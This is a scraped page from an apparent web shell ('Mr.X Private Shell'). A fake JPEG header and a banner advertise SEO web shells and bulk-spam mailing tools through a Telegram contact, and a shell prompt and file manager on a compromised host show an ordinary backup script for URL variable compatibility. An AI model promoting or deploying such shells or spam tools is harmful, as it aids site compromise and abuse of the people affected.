����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
### Backwards compatibility with NETFS_URL and ISO_URL

if [[ "$NETFS_URL" ]] ; then
    Log "Using NETFS_URL is deprecated. Use BACKUP_URL instead."
    BACKUP_URL=$NETFS_URL
fi

if [[ "$NETFS_MOUNTCMD" ]] ; then
    BACKUP_MOUNTCMD=$NETFS_MOUNTCMD
fi

if [[ "$NETFS_UMOUNTCMD" ]] ; then
    BACKUP_UMOUNTCMD=$NETFS_UMOUNTCMD
fi

if [[ "$NETFS_OPTIONS" ]] ; then
    BACKUP_OPTIONS=$NETFS_OPTIONS
fi

if [[ "$RSYNC_URL" ]] ; then
    Log "Using RSYNC_URL is deprecated. Use BACKUP_URL instead."
    BACKUP_URL=$RSYNC_URL
fi

test "$RSYNC_OPTIONS" && Error "RSYNC_OPTIONS is no longer supported. Use BACKUP_RSYNC_OPTIONS instead."

if [[ "$ISO_URL" ]] ; then
    Log "Using ISO_URL is deprecated. Use OUTPUT_URL instead."
    OUTPUT_URL=$ISO_URL
fi

if [[ "$ISO_MOUNTCMD" ]] ; then
    OUTPUT_MOUNTCMD=$ISO_MOUNTCMD
fi

if [[ "$ISO_UMOUNTCMD" ]] ; then
    OUTPUT_UMOUNTCMD=$ISO_UMOUNTCMD
fi

if [[ "$ISO_OPTIONS" ]] ; then
    OUTPUT_OPTIONS=$ISO_OPTIONS
fi

### Make sure we have OUTPUT_* from BACKUP_*, for compat with versions that
### not separated the two.

if [[ -z "$OUTPUT_OPTIONS" ]] ; then
    if [[ -z "$OUTPUT_URL" && -z "$OUTPUT_MOUNTCMD" ]] ; then
        ### There can be cases where it's intentionally empty.
        OUTPUT_OPTIONS=$BACKUP_OPTIONS
    fi
fi

if [[ -z "$OUTPUT_URL" ]] ; then
    if [[ "$USB_DEVICE" ]] ; then
        OUTPUT_URL="usb://$USB_DEVICE"
    elif [[ -z "$OUTPUT_MOUNTCMD" ]] ; then
        OUTPUT_URL=$BACKUP_URL
    fi
fi

if [[ -z "$OUTPUT_MOUNTCMD" ]] ; then
    if [[ -z "$OUTPUT_URL" ]] ; then
        OUTPUT_MOUNTCMD=$BACKUP_MOUNTCMD
    fi
fi

if [[ -z "$OUTPUT_UMOUNTCMD" ]] ; then
    if [[ -z "$OUTPUT_URL" && -z "$OUTPUT_MOUNTCMD" ]] ; then
        OUTPUT_UMOUNTCMD=$BACKUP_UMOUNTCMD
    fi
fi

Filemanager

Name Type Size Permission Actions
020_translate_url.sh File 1.71 KB 0644
040_translate_tape.sh File 932 B 0644
050_change_tape_name.sh File 285 B 0644
700_write_OBDR_header.sh File 1.2 KB 0644